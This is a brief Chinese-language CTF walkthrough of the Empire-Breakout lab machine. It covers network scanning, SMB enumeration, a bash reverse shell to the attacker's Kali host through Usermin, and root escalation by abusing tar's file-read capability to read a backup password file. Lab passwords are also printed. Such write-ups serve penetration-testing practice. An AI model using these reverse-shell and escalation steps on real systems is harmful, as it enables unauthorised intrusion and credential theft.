Empire-Breakout渗透过程(kali IP:192.168.39.128 靶机IP:192.168.39.130)
**一.信息收集**
nmap -sP 192.168.39.0/24
nmap -sV -p- 192.168.39.130
dirsearch 192.168.39.130
收集信息:开放端口80,20000,10000,445,139 中间件:apache 2.4.51 查看主页面源代码发现一个加密密码,解密为 .2uqPEfj3D<P'a-3
enum4linux -a 192.168.39.130 //得到密码,要想办法得到用户名,因为开放smb服务所以用enun4linux扫描,扫到一个cyber用户,登录进去看看,寻找发现usermin里的login的command shell可以执行命令
bash -i >& /dev/tcp/192.168.39.128/8888 0>&1 //反弹shell
**二.提权**
ls -al //发现tar有读权限
cat user.txt //得到一个flag
getcap tar //查看tar的能力,可以读取任意文件,则它的目的很可能是用tar去读取某个含有密码的文件
./tar -cvf test.tar /var/backups/.old_pass.bak //寻找发现old_pass隐藏目录直接查看没有权限,先用tar压缩,再解压查看
./tar -xvf test.tar
ls
cat /var/backups/.old_pass.bak //得到密码 Ts&4&YurgtRX(=~h
su root
cd /root
ls
cat r* //得到flag